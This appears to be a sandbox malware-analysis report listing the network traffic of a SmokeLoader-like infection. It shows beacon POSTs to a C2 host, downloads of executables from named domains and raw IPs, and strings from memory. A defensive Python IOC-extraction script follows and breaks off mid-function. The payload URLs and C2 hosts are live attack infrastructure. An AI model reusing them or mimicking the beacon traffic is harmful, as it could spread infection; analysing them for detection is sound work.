Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://rynnvo.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 137 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://kahaurdys.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 119 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ttbac.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 242 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://aubfgyajhw.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 204 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ryxvaojf.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 332 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://dusqhhm.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 287 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://wuqgjbcank.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 200 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://rcwmq.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 178 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://fgphlloppj.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 112 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://fasyb.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 266 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /l3.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 81.163.30.181
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://qajnwkj.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 136 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://xcbxaaktm.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 172 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /book/KB5009812.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 74.201.28.62
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://pwvhyavumw.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 224 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://elaxxedw.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 235 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://wfytf.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 114 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://phwtttkmh.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 265 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://xdhynq.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 188 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://kpspxwto.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 302 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://fnyafy.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 223 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /files/7729_1642101604_1835.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://cwjtumctb.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 148 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://psthjovmnc.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 233 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /l2.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 81.163.30.181
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://takjt.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 248 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://umolln.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 188 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ptkbedc.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 130 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://uoymbdayk.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 281 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://mqousgs.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 299 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://uhxofu.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 180 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://gmykjkt.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 155 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://quwfn.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 190 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://plgevhj.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 254 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://jwsdnsli.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 153 | Host: host-data-coin-11.com
Source: global traffic | TCP traffic: 192.168.2.5:49801 -> 185.7.214.171:8080
Source: global traffic | TCP traffic: 192.168.2.5:49821 -> 40.93.207.0:25
                      Source: svchost.exe, 0000002F.00000003.411494738.00000137971EE000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.411607267.0000013797184000.00000004.00000001.sdmpString found in binary or memory: http://www.facebook.com/spotify
                      Source: svchost.exe, 00000007.00000002.554990269.000002A7EAC62000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.396019650.00000000053C4000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.399454758.00000000053C4000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000002.430773686.0000013797100000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: svchost.exe, 00000007.00000002.554990269.000002A7EAC62000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000002.430423414.00000137968EB000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
                      Source: svchost.exe, 0000002F.00000003.406565308.000001379717C000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.406653017.00000137971CE000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.406610529.0000013797198000.00000004.00000001.sdmpString found in binary or memory: http://help.disneyplus.com.
                      Source: svchost.exe, 00000007.00000002.536270929.000002A7E56AB000.00000004.00000001.sdmpString found in binary or memory: http://schemas.microsoft.
                      Source: svchost.exe, 0000000A.00000002.308487293.0000021A33224000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                      Source: svchost.exe, 00000008.00000002.534681859.0000015FD863E000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                      Source: svchost.exe, 00000008.00000002.534681859.0000015FD863E000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
                      Source: svchost.exe, 00000008.00000002.534681859.0000015FD863E000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
                      Source: 3BC6.exe, 0000001E.00000002.412827478.0000000003991000.00000004.00000001.sdmp, 3BC6.exe, 0000002D.00000000.408848131.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.ip.sb/ip
                      Source: svchost.exe, 0000000A.00000003.304956046.0000021A33261000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                      Source: svchost.exe, 00000008.00000002.534681859.0000015FD863E000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 00000008.00000002.534681859.0000015FD863E000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 0000000A.00000003.304991834.0000021A3325A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000A.00000002.308731259.0000021A3325C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.304991834.0000021A3325A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 0000000A.00000003.304956046.0000021A33261000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                      Source: svchost.exe, 0000000A.00000002.308665617.0000021A3323C000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                      Source: svchost.exe, 0000000A.00000002.308731259.0000021A3325C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.304991834.0000021A3325A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
                      Source: svchost.exe, 0000000A.00000003.304930787.0000021A33268000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.308781800.0000021A3326A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
                      Source: svchost.exe, 0000000A.00000003.304956046.0000021A33261000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000A.00000002.308706855.0000021A3324D000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305040244.0000021A33246000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305019284.0000021A33240000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 0000000A.00000002.308731259.0000021A3325C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.304991834.0000021A3325A000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 0000000A.00000003.304956046.0000021A33261000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                      Source: svchost.exe, 0000000A.00000002.308665617.0000021A3323C000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                      Source: svchost.exe, 0000000A.00000003.304956046.0000021A33261000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                      Source: svchost.exe, 0000000A.00000003.304956046.0000021A33261000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                      Source: svchost.exe, 0000000A.00000003.304956046.0000021A33261000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                      Source: svchost.exe, 0000000A.00000002.308686012.0000021A33242000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305057096.0000021A33241000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305019284.0000021A33240000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                      Source: svchost.exe, 0000000A.00000002.308686012.0000021A33242000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305057096.0000021A33241000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305019284.0000021A33240000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                      Source: svchost.exe, 0000000A.00000003.304956046.0000021A33261000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000A.00000002.308731259.0000021A3325C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.304991834.0000021A3325A000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305019284.0000021A33240000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                      Source: svchost.exe, 0000002F.00000003.406565308.000001379717C000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.406653017.00000137971CE000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.406610529.0000013797198000.00000004.00000001.sdmpString found in binary or memory: https://disneyplus.com/legal.
                      Source: svchost.exe, 0000000A.00000003.304991834.0000021A3325A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000A.00000002.308731259.0000021A3325C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.304991834.0000021A3325A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000A.00000002.308731259.0000021A3325C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.304991834.0000021A3325A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.305019284.0000021A33240000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                      Source: svchost.exe, 0000000A.00000003.304956046.0000021A33261000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                      Source: svchost.exe, 0000000A.00000002.308665617.0000021A3323C000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000A.00000003.283348102.0000021A33231000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 0000000A.00000002.308665617.0000021A3323C000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                      Source: svchost.exe, 0000000A.00000002.308487293.0000021A33224000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.308665617.0000021A3323C000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.283348102.0000021A33231000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.305050188.0000021A33256000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.283348102.0000021A33231000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.283348102.0000021A33231000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.308656175.0000021A3323A000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                      Source: svchost.exe, 0000000A.00000002.308686012.0000021A33242000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305057096.0000021A33241000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305019284.0000021A33240000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen19
                      Source: svchost.exe, 0000002F.00000003.406565308.000001379717C000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.406653017.00000137971CE000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.406610529.0000013797198000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: svchost.exe, 0000002F.00000003.406565308.000001379717C000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.406653017.00000137971CE000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.406610529.0000013797198000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: svchost.exe, 0000002F.00000003.407630101.00000137971A4000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.407734160.000001379717C000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.407790447.0000013797602000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.407773416.000001379718D000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.407700908.00000137971A4000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: unknownDNS traffic detected: queries for: host-data-coin-11.com
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_00404BE0 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,InternetConnectA,InternetConnectA,HttpOpenRequestA,HttpOpenRequestA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,HttpQueryInfoA,StrCmpCA,Sleep,InternetReadFile,lstrcat,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
                      Source: global trafficHTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: GET /downloads/toolspab3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacy-tools-for-you-780.com
                      Source: global trafficHTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
                      Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
                      Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: GET /l3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 81.163.30.181
                      Source: global trafficHTTP traffic detected: GET /book/KB5009812.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 74.201.28.62
                      Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: GET /files/7729_1642101604_1835.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: GET /l2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 81.163.30.181
                      Source: global trafficHTTP traffic detected: GET /book/KB5009812.png HTTP/1.1Host: 74.201.28.62Connection: Keep-Alive
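Every POST in the eight lines above goes to the same Host (host-data-coin-11.com), to the bare path "/", as application/x-www-form-urlencoded with the IE11 Trident User-Agent, while the Referer names a different throw-away domain each time; that check-in shape is the one generally associated with SmokeLoader, the family the report's Yara rules flag. The GETs that follow fetch further executables from several hosts, two of them by raw IP, and the last request (the .png on 74.201.28.62) carries no User-Agent at all. The Python below is an added example, not part of the Joe Sandbox report: it parses the report's fused indicator lines back into method, path and headers, tags each request with the author's own hunting heuristics (decoy-Referer beacon, payload download, bare-IP host, missing User-Agent) and emits de-duplicated IOC lists. The sample input is rebuilt from the request lines above; the tag names and the heuristics are assumptions of this example, not findings of the report.

```python
# Added example (not from the sandbox report): parse the report's fused "HTTP traffic detected"
# lines and pull out IOCs. The tagging heuristics below are the author's own.
from __future__ import annotations

import re
from dataclasses import dataclass
from urllib.parse import urlparse

# The extraction dropped the line breaks between headers, so split on the header names
# that actually occur in the report's request lines.
_HEADER_NAMES = ("Connection", "Content-Type", "Accept", "Referer", "User-Agent", "Content-Length", "Host")
_REQ_LINE = re.compile(r"HTTP traffic detected: (GET|POST) (\S+) HTTP/1\.[01]")
_HDR_SPLIT = re.compile("(" + "|".join(map(re.escape, _HEADER_NAMES)) + "): ")
_IP_HOST = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?")
IE11_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko"


@dataclass
class Request:
    method: str
    path: str
    headers: dict[str, str]


def parse_request(indicator: str) -> Request | None:
    """Turn one fused indicator line into method, path and a header dict (None if not a request)."""
    m = _REQ_LINE.search(indicator)
    if not m:
        return None
    parts = _HDR_SPLIT.split(indicator[m.end():])  # ['', name, value, name, value, ...]
    headers = {parts[i]: parts[i + 1].strip() for i in range(1, len(parts) - 1, 2)}
    return Request(m.group(1), m.group(2), headers)


def tag_request(req: Request) -> list[str]:
    """Hunting heuristics (author's own): beacon shape, payload fetch, odd client, bare-IP host."""
    tags: list[str] = []
    host = req.headers.get("Host", "")
    referer_host = urlparse(req.headers.get("Referer", "")).hostname
    if (req.method == "POST" and req.path == "/"
            and req.headers.get("Content-Type") == "application/x-www-form-urlencoded"
            and req.headers.get("User-Agent") == IE11_UA
            and referer_host and referer_host != host):
        tags.append("beacon:decoy-referer")  # form POST to "/" citing an unrelated Referer domain
    if req.method == "GET" and req.path.lower().endswith(".exe"):
        tags.append("payload-download")
    if req.method == "GET" and "User-Agent" not in req.headers:
        tags.append("no-user-agent")  # a second downloader that does not send the IE11 UA
    if _IP_HOST.fullmatch(host):
        tags.append("host-is-ip")
    return tags


def extract_iocs(indicators: list[str]) -> dict[str, list[str]]:
    """Aggregate per-request tags into de-duplicated, sorted IOC lists."""
    c2, decoys, payloads, ips = set(), set(), set(), set()
    for line in indicators:
        req = parse_request(line)
        if req is None:
            continue
        tags = tag_request(req)
        if "beacon:decoy-referer" in tags:
            c2.add(req.headers["Host"])
            decoys.add(urlparse(req.headers["Referer"]).hostname)
        if "payload-download" in tags:
            payloads.add(f"http://{req.headers['Host']}{req.path}")
        if "host-is-ip" in tags:
            ips.add(req.headers["Host"])
    return {"c2_hosts": sorted(c2), "decoy_referers": sorted(decoys),
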